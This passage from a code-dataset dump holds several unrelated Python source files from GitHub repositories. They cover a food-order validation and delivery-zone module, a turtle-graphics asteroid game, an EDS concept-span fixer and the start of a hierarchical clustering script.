the first two seasons from the output list.\r\n # for germany [306*2:] since they have 306 games instead of 380 in one season\r\n GAMES = load_games(\"England\", (2012 - 2, 2012))[380*2:]\r\n print(len(GAMES))\r\n \r\nif __name__ == \"__main__\":\r\n main()","repo_name":"claudia-viaro/Wdss-UCLdss_research","sub_path":"(1)Bayesian methods in sport statistics/data_processor_1_0.py","file_name":"data_processor_1_0.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"17238836789","text":"# coding=utf-8\nfrom datetime import datetime, timedelta\nimport logging\nimport time\n\nfrom google.appengine.api import memcache\n\nfrom google.appengine.ext.ndb import GeoPt\n\nfrom models.config.config import config\nfrom methods import location\nfrom methods.geocoder import get_houses_by_address, get_areas_by_coordinates, get_streets_or_houses_by_address\nfrom methods.orders.validation.validation import get_first_error\nfrom methods.rendering import latinize, get_phone, get_separated_name_surname, \\\n parse_time_picker_value, get_device_type\nfrom models import Order, Client, Venue, STATUS_AVAILABLE, DeliverySlot, DeliveryZone, STATUS_UNAVAILABLE\nfrom models.order import NOT_CANCELED_STATUSES\nfrom models.venue import DELIVERY\n\n__author__ = 'dvpermyakov'\n\n\ndef get_order_id(order_json):\n def _cache_key(order_id):\n return \"order_%s\" % order_id\n\n def _check(order_id, cache_key):\n if Order.get_by_id(order_id) or not memcache.add(cache_key, 1):\n logging.warning(\"order_id check: %s is in use\", order_id)\n return False\n return True\n\n order_id = order_json.get('order_id')\n if order_id:\n logging.debug(\"order_id check: got %s from json\", order_id)\n order_id = int(order_id)\n cache_key = _cache_key(order_id)\n return order_id, cache_key if _check(order_id, cache_key) else None, None\n else:\n for _ in xrange(3):\n order_id = Order.generate_id()\n cache_key = _cache_key(order_id)\n logging.debug(\"order_id check: generated %s\", order_id)\n if _check(order_id, cache_key):\n return order_id, cache_key\n time.sleep(0.05) # sleep 50ms for fastcounter\n return None, None\n\n\ndef set_extra_order_info(order, extra_info, num_people, cash_change):\n extra_json = {}\n if config.ORDER_MODULE and config.ORDER_MODULE.status == STATUS_AVAILABLE:\n for field in config.ORDER_MODULE.extra_fields:\n group_key = latinize(field.group_title)\n field_key = latinize(field.title)\n group_dict = extra_info.get(group_key)\n value = group_dict.get(field_key) if group_dict else None\n extra_json[field_key] = value\n if config.ORDER_MODULE.enable_number_of_people:\n extra_json['num_people'] = num_people\n if config.ORDER_MODULE.enable_change:\n extra_json['cash_change'] = cash_change\n order.extra_data = extra_json\n\n\ndef check_items_and_gifts(order_json):\n if not order_json['items'] and not order_json.get('gifts') and not order_json.get('order_gifts'):\n return False\n else:\n return True\n\n\ndef set_client_info(client_json, headers):\n client_id = int(client_json.get('id', 0)) or int(headers.get('Client-Id') or 0)\n if not client_id:\n return None\n client = Client.get(client_id)\n if not client:\n return None\n name, surname = get_separated_name_surname(client_json.get('name'))\n client.name = name\n client.surname = surname\n client.tel = get_phone(client_json.get('phone'))\n client.email = client_json.get('email')\n client.user_agent = headers['User-Agent']\n if not client.device_type:\n client.device_type = get_device_type(client.user_agent)\n client.version = headers.get('Version', 0)\n extra_json = {}\n groups = client_json.get('groups') or {}\n if config.CLIENT_MODULE and config.CLIENT_MODULE.status == STATUS_AVAILABLE:\n for field in config.CLIENT_MODULE.extra_fields:\n group_key = latinize(field.group_title)\n field_key = latinize(field.title)\n group_dict = groups.get(group_key)\n value = group_dict.get(field_key) if group_dict else None\n extra_json[field_key] = value\n client.extra_data = extra_json\n client.put()\n return client\n\n\ndef validate_address(address):\n logging.info('initial address = %s' % address)\n\n # case of street and home are separated by comma\n if ',' in address['address']['street']:\n address['address']['home'] = address['address']['street'].split(',')[1]\n address['address']['street'] = address['address']['street'].split(',')[0]\n\n # trim blank spaces\n address['address']['city'] = address['address']['city'].strip()\n address['address']['street'] = address['address']['street'].strip().capitalize()\n address['address']['home'] = address['address']['home'].strip()\n if address['address'].get('flat'):\n address['address']['flat'] = address['address']['flat'].strip()\n\n # not trust\n address['coordinates']['lat'] = None\n address['coordinates']['lon'] = None\n\n # try to get coordinates\n candidates = get_houses_by_address(address['address']['city'], address['address']['street'],\n address['address']['home'])\n for candidate in candidates:\n if candidate['address']['city'].lower() == address['address']['city'].lower():\n if candidate['address']['street'].lower() == address['address']['street'].lower():\n if candidate['address']['home'].lower() == address['address']['home'].lower():\n address['coordinates']['lat'] = candidate['coordinates']['lat']\n address['coordinates']['lon'] = candidate['coordinates']['lon']\n if address['coordinates']['lat'] and address['coordinates']['lon']:\n break\n\n\n # if yandex maps did not find required address in the query, but there is suggested address\n # with same street, assign its coordinates to our address\n if not address['coordinates']['lat'] or not address['coordinates']['lon']:\n if len(candidates) > 0:\n if candidates[0]['address']['street'].lower() == address['address']['street'].lower():\n address['coordinates']['lat'] = candidates[0]['coordinates']['lat']\n address['coordinates']['lon'] = candidates[0]['coordinates']['lon']\n # if any house was found, method checks if there are such streets\n else:\n candidates = get_streets_or_houses_by_address(address['address']['city'], address['address']['street'])\n if len(candidates) > 0:\n if candidates[0]['address']['street'].lower() == address['address']['street'].lower():\n address['coordinates']['lat'] = candidates[0]['coordinates']['lat']\n address['coordinates']['lon'] = candidates[0]['coordinates']['lon']\n\n logging.info('result address = %s' % address)\n return address\n\n\ndef get_venue_and_zone_by_address(address):\n area = None\n venues = Venue.fetch_venues(Venue.active == True)\n if address:\n has_coords = False\n if address.get('coordinates'):\n if address['coordinates'].get('lat') and address['coordinates'].get('lon'):\n has_coords = True\n nearest_venues = [] # it is used for getting nearest venue if zone is not found\n\n ZONE_SEARCH_TYPES = (DeliveryZone.ZONE, DeliveryZone.RADIUS, DeliveryZone.NEAREST, DeliveryZone.DISTRICT,\n DeliveryZone.CITY, DeliveryZone.DEFAULT)\n\n for zone_type in ZONE_SEARCH_TYPES:\n for venue in venues:\n delivery = venue.get_delivery_type(DELIVERY)\n delivery_zones = [DeliveryZone.get(zone_key) for zone_key in delivery.delivery_zones]\n delivery_zones = sorted([zone for zone in delivery_zones if zone.status == STATUS_AVAILABLE],\n key=lambda zone: zone.sequence_number)\n\n if not delivery or delivery.status == STATUS_UNAVAILABLE:\n continue\n\n current_zones = [zone for zone in delivery_zones if zone.search_type == zone_type]\n for zone in sorted(current_zones, key=lambda zone: zone.sequence_number):\n\n # case 1: get venue by custom zone\n if zone.search_type == DeliveryZone.ZONE:\n if has_coords and zone.is_included(address):\n zone.found = True\n return venue, zone\n # case 2: get venue by radius\n elif zone.search_type == DeliveryZone.RADIUS:\n if has_coords:\n distance = location.distance(\n GeoPt(address['coordinates']['lat'], address['coordinates']['lon']),\n GeoPt(zone.address.lat, zone.address.lon))\n if distance <= zone.value:\n zone.found = True\n return venue, zone\n # case 3: add nearest venues\n elif zone.search_type == DeliveryZone.NEAREST:\n if has_coords:\n venue.distance = location.distance(\n GeoPt(address['coordinates']['lat'], address['coordinates']['lon']),\n venue.coordinates)\n venue.zone = zone\n nearest_venues.append(venue)\n # case 4: get venue by district\n elif zone.search_type == DeliveryZone.DISTRICT:\n if has_coords and zone.address.area:\n if not area:\n candidates = get_areas_by_coordinates(address['coordinates']['lat'],\n address['coordinates']['lon'])\n if candidates:\n area = candidates[0]['address']['area']\n if not area:\n area = u'Not found'\n if zone.address.area == area:\n zone.found = True\n return venue, zone\n # case 5: get venue by city\n elif zone.search_type == DeliveryZone.CITY:\n if address['address']['city'] == zone.address.city:\n zone.found = True\n return venue, zone\n # case 6: get default venue\n elif zone.search_type == DeliveryZone.DEFAULT:\n zone.found = False\n return venue, zone\n\n if nearest_venues:\n venue = sorted(nearest_venues, key=lambda venue: venue.distance)[0]\n venue.zone.found = True\n return venue, venue.zone\n\n if not address or \\\n not address.get('coordinates') or \\\n not address['coordinates'].get('lat') or \\\n not address['coordinates'].get('lon') or \\\n not area:\n\n default_venues = [venue for venue in venues if venue.default == True]\n\n # case 7: get first venue with default flag\n for venue in default_venues:\n delivery = venue.get_delivery_type(DELIVERY)\n if not delivery or delivery.status == STATUS_UNAVAILABLE:\n continue\n zones = sorted([DeliveryZone.get(zone_key) for zone_key in delivery.delivery_zones],\n key=lambda zone: zone.sequence_number)\n if len(zones) > 0:\n zones[0].found = False\n return venue, zones[0]\n\n # case 8: if company rejects orders not in zones\n if config.REJECT_IF_NOT_IN_ZONES:\n return None, None\n\n # case 9: get first venue\n for venue in venues:\n delivery = venue.get_delivery_type(DELIVERY)\n if not delivery or delivery.status == STATUS_UNAVAILABLE:\n continue\n zones = sorted([DeliveryZone.get(zone_key) for zone_key in delivery.delivery_zones],\n key=lambda zone: zone.sequence_number)\n if len(zones) > 0:\n zones[0].found = False\n return venue, zones[0]\n\n return None, None\n\n\ndef get_delivery_time(delivery_time_picker, venue, delivery_slot=None, delivery_time_minutes=None):\n logging.debug('DELIVERY_TIME_PICKER: {0}'.format(delivery_time_picker))\n if delivery_time_picker:\n delivery_time_picker = parse_time_picker_value(delivery_time_picker)\n if venue and (not delivery_slot or delivery_slot.slot_type == DeliverySlot.MINUTES):\n delivery_time_picker -= timedelta(hours=venue.timezone_offset)\n\n if delivery_slot:\n if delivery_slot.slot_type == DeliverySlot.MINUTES:\n delivery_time_minutes = delivery_slot.value\n delivery_time_picker = datetime.utcnow()\n elif delivery_slot.slot_type == DeliverySlot.HOURS_FROM_MIDNIGHT:\n if venue:\n tz = venue.timezone_offset\n else:\n tz = Venue.get_first_tz()\n if not delivery_time_picker:\n delivery_time_picker = datetime.now(tz=tz)\n delivery_time_picker = delivery_time_picker.replace(hour=0, minute=0, second=0, microsecond=0)\n delivery_time_picker += timedelta(hours=delivery_slot.value - tz)\n delivery_time_picker += timedelta(seconds=1) # it is need for being after specific hour in schedule\n elif delivery_slot.slot_type == DeliverySlot.STRINGS:\n if delivery_time_picker:\n delivery_time_picker = delivery_time_picker.replace(hour=0, minute=0, second=0)\n\n delivery_time = None\n if delivery_time_picker:\n delivery_time = delivery_time_picker\n if delivery_time_minutes or delivery_time_minutes == 0:\n if not delivery_time:\n delivery_time = datetime.utcnow()\n delivery_time += timedelta(minutes=delivery_time_minutes)\n return delivery_time\n\n\ndef check_after_error(order_json, client):\n MINUTES = 1\n min_ago = datetime.utcnow() - timedelta(minutes=MINUTES)\n previous_order = Order.query(Order.client_id == client.key.id(),\n Order.status.IN(NOT_CANCELED_STATUSES),\n Order.date_created >= min_ago).get()\n if not previous_order:\n return False\n group_details = Order.grouped_item_dict(previous_order.item_details)\n if len(order_json['items']) != len(group_details):\n return False\n for index, item_detail in enumerate(group_details):\n item_dict = order_json['items'][index]\n if item_dict['item_id'] != item_detail['id'] or item_dict['quantity'] != item_detail['quantity']:\n return False\n return True\n\n\ndef after_validation_check(validation_result, order):\n if not validation_result['valid']:\n logging.warning('Fail in validation')\n return False, get_first_error(validation_result)\n\n total_sum = validation_result['total_sum']\n delivery_sum = validation_result['delivery_sum']\n if order.total_sum and round(total_sum * 100) != round(order.total_sum * 100):\n return False, u\"Сумма заказа была пересчитана\"\n\n # order.total_sum is here either correct or 0\n # it can be 0 because of client-side bugs (we get it from json-object in request)\n order.total_sum = total_sum\n\n if not order.delivery_sum:\n order.delivery_sum = delivery_sum\n if order.delivery_sum and round(delivery_sum * 100) != round(order.delivery_sum * 100):\n return False, u\"Сумма доставки была пересчитана\"\n if order.wallet_payment and round(order.wallet_payment * 100) != round(\n validation_result['max_wallet_payment'] * 100):\n return False, u\"Сумма оплаты баллами была пересчитана\"\n if validation_result['unavail_order_gifts'] or validation_result['new_order_gifts']:\n return False, u\"Подарки были пересчитаны\"\n return True, None\n","repo_name":"lopatinsky/automation-gae","sub_path":"methods/orders/validation/precheck.py","file_name":"precheck.py","file_ext":"py","file_size_in_byte":15943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38072918889","text":"# -*- coding: utf-8 -*-\r\n#Hyeon Jeong Byeon\r\n\r\nimport turtle\r\nimport random\r\nimport time\r\n\r\nplayer = turtle.Turtle() #우주선\r\nplayer.color(\"blue\")\r\nplayer.shape(\"turtle\")\r\nplayer.penup()\r\nplayer.speed(0)\r\n\r\na1 = turtle.Turtle() #소행성1\r\na1.color(\"red\")\r\na1.shape(\"circle\")\r\na1.penup()\r\na1.speed(0)\r\na1.goto(random.randint(-300,300), random.randint(-300,300))\r\n\r\na2 = turtle.Turtle() #소행성2\r\na2.color(\"yellow\")\r\na2.shape(\"circle\")\r\na2.penup()\r\na2.speed(0)\r\na2.goto(random.randint(-300,300),random.randint(-300,300))\r\n\r\nscreen = turtle.Screen()\r\n\r\ncrasheda1 = False\r\ncrasheda2 = False\r\n\r\n\r\n### --- Functions --- ###\r\n\r\n\r\ndef turnleft():\r\n player.left(30) #왼쪽으로 30도 회전한다.\r\n\r\ndef turnright():\r\n player.right(30) #오른쪽으로 30도 회전한다. \r\n\r\nspeed = 2\r\n\r\ndef speedUp():\r\n global speed\r\n speed += 1\r\n if speed == 5:\r\n speed = 2\r\n\r\nscreen.onkeypress(turnleft,\"Left\")\r\nscreen.onkeypress(turnright, \"Right\")\r\nscreen.onkeypress(speedUp,\"space\")\r\nscreen.listen() #거북이 그래픽 창이 키보드 입력을 받는다.\r\n\r\ndef play():\r\n player.forward(speed) #2픽셀 전진\r\n if crasheda1 == False:\r\n a1.forward(2)\r\n if crasheda2 == False:\r\n a2.forward(2)\r\n checkPosition()\r\n checkCrash()\r\n if gameOver() == False:\r\n screen.ontimer(play,10) #10ms가 지나면 play()를 호출한다.\r\n\r\ndef checkPosition():\r\n #소행성과 사용자의 위치가 범위를 벗어났을 때 그 위치를 조정하는 함수\r\n #소행성(a1,a2)는 오른쪽으로만 진행하므로 x좌표만 검사\r\n if a1.xcor()>500:\r\n a1.goto(random.randint(-300,300), random.randint(-300,300))\r\n if a2.xcor()>500:\r\n a2.goto(random.randint(-300,300), random.randint(-300,300))\r\n if player.xcor()<-500 or player.xcor()>500 or player.ycor()<-500 or player.ycor()>500:\r\n player.goto(0,0)\r\n #우주선은 원점으로 오게 한다.\r\n \r\n\r\ndef checkCrash():\r\n global crasheda1\r\n global crasheda2\r\n \r\n if player.distance(a1)<12:\r\n a1.color(\"black\")\r\n crasheda1 = True \r\n if player.distance(a2)<12:\r\n a2.color(\"black\")\r\n crasheda2 = True \r\n\r\ndef gameOver():\r\n if crasheda1 == True and crasheda2 == True:\r\n end = time.time()\r\n et = end - start\r\n player.write(\"GameOver : %0.2f\"%et, False, \"center\", (\"Arial\",15, \"bold\"))\r\n return True\r\n else:\r\n return False\r\n\r\n### --- Main Screen --- ###\r\n\r\n\r\n#10ms 후 부터 게임을 시작하도록 설정한다.\r\nstart = time.time()\r\n\r\nscreen.ontimer(play, 10) #10ms가 지나면 play()를 호출한다.\r\n\r\n\r\n\r\n\r\n","repo_name":"hyeonJeongByeon/Python_2nd_Homework","sub_path":"변현정_Asteroid_Game.py","file_name":"변현정_Asteroid_Game.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27483048119","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport re\n\nfrom framework.common.logger import LOGGER, open_file\nfrom framework.data_structures.union_find import UnionNode\nfrom SHRG.utils.lexicon import get_lemma_and_pos, get_wordnet\n\n\nclass EdsWrapper:\n class Node:\n __slots__ = [\n 'lemma', 'pos', 'carg', 'label', 'span', 'sense',\n 'outgoing_edges', 'incoming_edges',\n ]\n\n def __init__(self, lemma, pos, sense, carg, label, span, outgoing_edges):\n self.lemma = lemma\n self.pos = pos\n self.sense = sense\n self.carg = carg\n self.label = label\n self.outgoing_edges = outgoing_edges\n self.incoming_edges = []\n self.span = span\n\n def __repr__(self):\n return str(self)\n\n def __str__(self):\n return '{}<{}:{}>'.format(self.label, self.span[0], self.span[1])\n\n def __init__(self, sentence, original_nodes, original_edges):\n self.sentence = sentence\n\n nodes = {}\n for node, edges in zip(original_nodes, original_edges):\n # node span\n span = -1, -1\n if node.lnk is not None:\n span = node.cfrom, node.cto\n # node properties\n nodes[node.nodeid] = self.Node(lemma=node.pred.lemma,\n pos=node.pred.pos,\n sense=node.pred.sense,\n carg=node.carg,\n label=node.pred.short_form(),\n span=span,\n outgoing_edges=edges)\n\n self.nodes = nodes # type: Dict[NodeID, 'EdsGraph.Node']\n\n for source_id in nodes: # set incoming_edges\n edges = nodes[source_id].outgoing_edges\n for elabel, target_id in edges.items():\n nodes[target_id].incoming_edges.append((elabel, source_id))\n\n\ndef _is_overlapped(span1, span2):\n return span1[0] < span2[1] and span1[1] > span2[0]\n\n\ndef _is_any_overlapped(spans):\n spans = list(spans)\n for index, span1 in enumerate(spans):\n for span2 in spans[:index]:\n if _is_overlapped(span1, span2):\n return True\n return False\n\n\ndef _span_subtract_span(span1, span2): # span1 - span2\n if span2[0] > span1[0] and span2[1] >= span1[1]:\n return span1[0], span2[0]\n if span2[1] < span1[1] and span2[0] <= span1[0]:\n return span2[1], span1[1]\n\n\ndef _merge_spans(spans):\n missing_spans = []\n last_end = -1\n for start, end in sorted(spans):\n if last_end != -1 and start > last_end:\n missing_spans.append((last_end, start))\n last_end = end\n return missing_spans\n\n\ndef _find_span_in_spans_multi(target_span, spans):\n first, end = 0, -1\n while first < len(spans):\n span = spans[first]\n if target_span[0] <= span[0] and target_span[0] >= end:\n break\n end = span[1]\n first += 1\n\n last, start = len(spans), spans[-1][1] + 1\n while last > first:\n span = spans[last - 1]\n if target_span[1] >= span[1] and target_span[1] <= start:\n break\n start = span[0]\n last -= 1\n\n return first, last\n\n\ndef _find_span_in_spans_single(target_span, spans):\n for index, span in enumerate(spans):\n if span[0] <= target_span[0] and span[1] >= target_span[1]:\n return index\n\n\ndef _get_parents_by_label(graph, node, label, return_edge_label=False):\n parents = []\n for elabel, parent_id in node.incoming_edges:\n parent = graph.nodes[parent_id]\n if parent.label == label:\n if return_edge_label:\n parents.append((elabel, parent))\n else:\n parents.append(parent)\n return parents\n\n\ndef _match_label(input_value, pattern):\n if isinstance(pattern, str):\n return input_value == pattern\n if callable(pattern):\n return pattern(input_value)\n if isinstance(pattern, (tuple, list, set)):\n return input_value in pattern\n\n return re.match(pattern, input_value)\n\n\ndef get_word_bounds(string):\n s, e = 0, len(string)\n while s < e and not string[s].isalnum():\n s += 1\n while s < e and not string[e - 1].isalnum():\n e -= 1\n return s, e\n\n\ndef get_word_bounds2(string, chars):\n s, e = 0, len(string)\n while s < e and string[s] in chars:\n s += 1\n while s < e and string[e - 1] in chars:\n e -= 1\n return s, e\n\n\nclass ConceptSpanFixer:\n def __init__(self, config_path=None):\n if config_path is None:\n config_path = os.path.join(os.path.dirname(__file__),\n 'concept_fixer_config.py')\n attrs = {}\n code = open_file(config_path, 'r').read()\n exec(compile(code, config_path, 'exec'), {'re': re}, attrs)\n for name, value in attrs.items():\n if name.isupper():\n setattr(self, name, value)\n\n def get_clusters(self, sentence, nodes):\n nodes = {nodeid: node for nodeid, node in nodes.items()\n if (node.label.startswith('_')\n or node.label in self.SPECIAL_LABELS_AS_NORMAL_NODE\n or node.carg is not None)}\n\n groups = {nodeid: UnionNode(nodeid) for nodeid in nodes}\n for nodeid, node in nodes.items():\n for other_nodeid, other_node in nodes.items():\n if nodeid != other_nodeid \\\n and _is_overlapped(nodes[other_nodeid].span, node.span):\n groups[nodeid].union(groups[other_nodeid])\n\n clusters = {}\n for group in groups.values():\n clusters.setdefault(group.find().value, set()).add(group.value)\n\n return list(clusters.values())\n\n def fix_stage1(self, graph):\n \"\"\"deal with nodes like pre-, mid-, re-\"\"\"\n nodes = graph.nodes\n for nodeid, node in nodes.items():\n match = re.match(self.PREFIX_REGEX, node.label)\n arg1_nodeid = node.outgoing_edges.get('ARG1')\n if match and arg1_nodeid:\n LOGGER.debug('prefix: %s', match.group(0))\n prefix = match.group(1).rstrip('-')\n\n arg1_node = nodes[arg1_nodeid]\n if arg1_node.label == 'nominalization': # skip nominalization\n arg1_node = nodes[arg1_node.outgoing_edges.get('ARG1')]\n\n # change span of arg1_node to the span without prefix\n beg = graph.sentence.lower().find(prefix, *node.span)\n if beg != -1:\n end = beg + len(prefix)\n LOGGER.debug(' `%s` <-> `%s`: %s', node.span, (beg, end), node.label)\n node.span = beg, end\n if graph.sentence[end] == '-':\n end += 1\n assert end < arg1_node.span[1]\n LOGGER.debug(' `%s` <-> `%s`: %s',\n arg1_node.span, (end, arg1_node.span[1]),\n arg1_node.label)\n arg1_node.span = end, arg1_node.span[1]\n\n def fix_stage2(self, graph):\n nodes = graph.nodes\n sentence = graph.sentence\n\n clusters = self.get_clusters(sentence, nodes)\n\n states = []\n for cluster in clusters:\n if len(cluster) > 1:\n cluster_nodes = {nodeid: nodes[nodeid] for nodeid in cluster}\n assert not self._fix_stage2(graph, cluster_nodes), cluster_nodes\n\n return states\n\n def _fix_stage2(self, graph, cluster_nodes):\n sentence = graph.sentence\n nodes = graph.nodes\n\n covered_spans = {}\n for nodeid, node in list(cluster_nodes.items()):\n is_number = _match_label(node.label, self.IS_NUMBER)\n is_name = node.carg is not None or _match_label(node.label, self.IS_NAMED)\n is_much = _match_label(node.label, self.IS_MUCH)\n is_comp = _match_label(node.label, self.IS_COMP)\n is_neg = _match_label(node.label, self.IS_NEG)\n\n if not (is_number or is_name or is_much or is_comp or is_neg\n or node.label.startswith('_')):\n continue\n\n matched_tokens, sep = \\\n self._get_matched_tokens(node, sentence, nodes,\n is_number, is_name, is_much, is_comp, is_neg)\n\n if not matched_tokens:\n continue\n\n matched_tokens = [(span, word)\n for span, word in matched_tokens\n if span not in covered_spans]\n\n if len(matched_tokens) > 1 \\\n and all(word == matched_tokens[0][1] for _, word in matched_tokens):\n matched_tokens = matched_tokens[:1] # select first one\n\n if len(matched_tokens) == 1:\n span = matched_tokens[0][0]\n for other_span in covered_spans:\n if _is_overlapped(other_span, span):\n __import__(\"pdb\").set_trace()\n assert not _is_overlapped(other_span, span)\n covered_spans[span] = nodeid, node\n node.span = span\n\n if len(cluster_nodes) != len(covered_spans):\n solved_nodeids = {nodeid for nodeid, _ in covered_spans.values()}\n unsolved_nodes = [node for nodeid, node in cluster_nodes.items()\n if nodeid not in solved_nodeids]\n unsolved_labels = {node.label for node in unsolved_nodes}\n if unsolved_labels in self.IGNORE_LABEL_SETS:\n return\n\n if not _is_any_overlapped(node.span for node in cluster_nodes.values()):\n # all nodes in cluster are disconnected\n return\n\n missing_spans = _merge_spans(covered_spans)\n if not self._fix_stage2_special(sentence, solved_nodeids, unsolved_nodes,\n missing_spans, covered_spans):\n return cluster_nodes, covered_spans\n\n def _fix_stage2_special(self, sentence, solved_nodeids, unsolved_nodes,\n missing_spans, covered_spans):\n SPECIAL_NEG_REGEX = '(^.+(?:\\'t|not)$)|^un|^dis'\n\n missing_tokens = [sentence[span[0]:span[1]] for span in missing_spans]\n if all(token == '/' for token in missing_tokens) \\\n and all(node.label in {'_and_c', '_per_p'} for node in unsolved_nodes) \\\n and len(unsolved_nodes) == len(missing_spans):\n for node, span in zip(unsolved_nodes, missing_spans):\n node.span = span\n return True\n\n if len(unsolved_nodes) == 2:\n node1, node2 = unsolved_nodes\n if node1.span == node2.span:\n span = node1.span\n string = sentence[span[0]:span[1]]\n if re.match(SPECIAL_NEG_REGEX, string.strip(self.PUNCTUATIONS)):\n if node1.label == 'neg' or node2.label == 'neg':\n LOGGER.debug('special neg: %s %s %s', node1, node2, string)\n return True\n\n if len(unsolved_nodes) == 1:\n node = unsolved_nodes[0]\n rest_span = node.span\n for span in covered_spans:\n rest_span = _span_subtract_span(rest_span, span)\n if rest_span is None:\n break\n\n if rest_span is not None:\n string = sentence[rest_span[0]:rest_span[1]]\n s, e = get_word_bounds2(string, '-/')\n node.span = rest_span[0] + s, rest_span[0] + e\n LOGGER.debug('use rest span: %s %s %s', node, string,\n sentence[node.span[0]:node.span[1]])\n return True\n\n def _get_tokens(self, node, sentence):\n span = node.span\n\n string = sentence[span[0]:span[1]].lower()\n # 清理两侧的标点, 但是记录位置\n s, e = get_word_bounds(string)\n stripped_string = string[s:e]\n\n tokens = None\n try_chars, *special_cases = self.SPLIT_STRINGS\n for matcher, sep, extra in special_cases:\n result = _match_label(stripped_string, matcher)\n if result:\n if extra and isinstance(extra[0], str):\n tokens = extra\n elif extra and isinstance(extra[0], int):\n tokens = [result.group(index) for index in extra]\n else:\n tokens = stripped_string.split(sep)\n break\n\n if tokens is None:\n for sep in try_chars:\n tokens = stripped_string.split(sep)\n if len(tokens) > 1:\n break\n\n token_starts = [s]\n for token in tokens[:-1]:\n token_starts.append(token_starts[-1] + len(sep) + len(token))\n\n new_token_starts = []\n new_tokens = []\n for token, token_start in zip(tokens, token_starts):\n new_token_starts.append(token_start)\n for subtoken in token.split(' '):\n new_tokens.append(subtoken)\n new_token_starts.append(new_token_starts[-1] + len(subtoken) + 1)\n new_token_starts.pop()\n\n if len(new_tokens) <= 1:\n return None, None, None\n\n start = node.span[0]\n for token, token_start in zip(new_tokens, new_token_starts):\n token_start += start\n if token != sentence[token_start:token_start + len(token)].lower():\n __import__(\"pdb\").set_trace()\n\n return new_tokens, new_token_starts, sep\n\n def _get_carg(self, node, sep):\n return node.carg.lower() \\\n .replace('+', ' ') \\\n .replace('_', ' ').strip().rstrip(sep)\n\n def _get_matcher(self, node, sentence, sep,\n is_number, is_name, is_much, is_comp, is_neg):\n if is_number:\n carg = self._get_carg(node, sep)\n matcher = self.CARD_TRANSFORM.get(carg, carg)\n elif is_comp:\n matcher = self.COMP_REGEX\n elif is_name:\n matcher = self._get_carg(node, sep)\n # 去掉结尾的 '-'\n if matcher[-1] == sep:\n matcher = matcher[:-1]\n matcher = self.NAME_ENTITY.get(matcher, matcher)\n elif is_neg:\n matcher = self.NEG_REGEX\n elif is_much:\n matcher = self.MUCH_REGEX\n else:\n matcher, _ = get_lemma_and_pos(node.label)\n\n matcher = self.REGEX_MAP.get(matcher, matcher)\n\n return matcher\n\n def _get_lemma(self, token, pos_tag):\n token = token.strip(self.PUNCTUATIONS)\n try:\n return get_wordnet().lemmatize(token, pos_tag)\n except Exception:\n return token\n\n def _get_matched_tokens(self, node, sentence, nodes,\n is_number, is_name, is_much, is_comp, is_neg):\n tokens, token_starts, sep = self._get_tokens(node, sentence)\n if tokens is None:\n return None, None\n\n matcher = self._get_matcher(node, sentence, sep,\n is_number, is_name, is_much, is_comp, is_neg)\n\n matched_tokens = []\n\n for token, token_start in zip(tokens, token_starts):\n start = token_start + node.span[0]\n token_lemma = self._get_lemma(token, node.pos)\n if isinstance(matcher, str):\n pred = token == matcher \\\n or (token_lemma, matcher) in self.TOKEN_LEMMA_SPECIAL_CASE \\\n or token_lemma.startswith(matcher) \\\n or (len(token_lemma) >= 3 and matcher.startswith(token_lemma)) \\\n or (token_lemma.endswith('ied') and\n token_lemma[:-3] == matcher[:-1])\n else:\n pred = re.match(matcher, token_lemma)\n\n if pred:\n matched_tokens.append(((start, start + len(token)), token))\n\n exact_tokens = [(span, token) for span, token in matched_tokens if token == matcher]\n if len(exact_tokens) == 1:\n if len(matched_tokens) > 1:\n LOGGER.debug('use exact match: %s %s', node, matched_tokens)\n matched_tokens = [exact_tokens[0]]\n\n return matched_tokens, sep\n\n def fix_stage3(self, graph, tokens, spans):\n\n chars = '-/.,\"?!;() '\n for node in graph.nodes.values():\n start, end = node.span\n\n first, last = _find_span_in_spans_multi((start, end), spans)\n if first == last:\n continue\n\n while first < last \\\n and all((char in chars) for char in tokens[first]):\n first += 1\n\n while first < last \\\n and all((char in chars) for char in tokens[last - 1]):\n last -= 1\n\n if first < last:\n span = spans[first][0], spans[last - 1][1]\n if span != node.span:\n node.span = span\n","repo_name":"hejingcao/semantic-parser","sub_path":"preprocess/concept_fixer.py","file_name":"concept_fixer.py","file_ext":"py","file_size_in_byte":17173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14684216419","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[42]:\n\n\nimport pickle\nwith open('dataset.pkl','rb') as f:\n dist = pickle.load(f)\n\n\n# In[43]:\n\n\nfor key in dist.keys():\n print(key,dist[key])\n\n\n# In[106]:\n\n\nmetric = input(\"Please enter 'min', 'max' or 'av'\")\n\n\n# In[107]:\n\n\nimport math\n\n\n# In[108]:\n\n\nclusters = []\nfor i in range(311):\n clusters.append([i])\nprint(clusters)\n\n\n# In[109]:\n\n\ndef dist_cluster(cluster1, cluster2, metric):\n min_dist = math.inf\n max_dist = -math.inf\n av_dist = 0\n count=0\n for i in cluster1:\n for j in cluster2:\n count+=1\n if(dist[(i,j)] > max_dist):\n max_dist = dist[(i,j)]\n if(dist[(i,j)] < min_dist):\n min_dist = dist[(i,j)]\n av_dist+=dist[(i,j)]\n if(metric=='min'):\n return min_dist\n elif(metric=='max'):\n return max_dist\n elif(metric=='av'):\n return av_dist\n \n\n\n# In[110]:\n\n\ndef WSS(cluster):\n minss = 10e9\n #print(cluster)\n for point in cluster:\n squaredsum = 0\n for ppoint in cluster:\n #print(point,ppoint)\n squaredsum += dist[(point,ppoint)]\n if squaredsum < minss:\n minss = squaredsum\n return minss\n\n\n# In[111]:\n\n\ncount_iter=0\nWSS_list = []\nclust_list = []\n\nwhile(len(clusters)>1):\n #print(len(clusters))\n clust_list.append(len(clusters))\n #print(len(clust_list))\n WSS_temp=0\n for cluster in clusters:\n WSS_temp+=WSS(cluster)\n WSS_list.append(WSS_temp)\n '''\n print(clusters)\n print(WSS(clusters))\n print(\"###################\")\n '''\n \n #NUMBER OF CLUSTERS WILL REDUCE BY 1 ON EACH ITERATION\n\n min_dist = math.inf\n clust1_idx = 0\n clust2_idx = 0\n \n #FIND THE TWO CLUSTERS 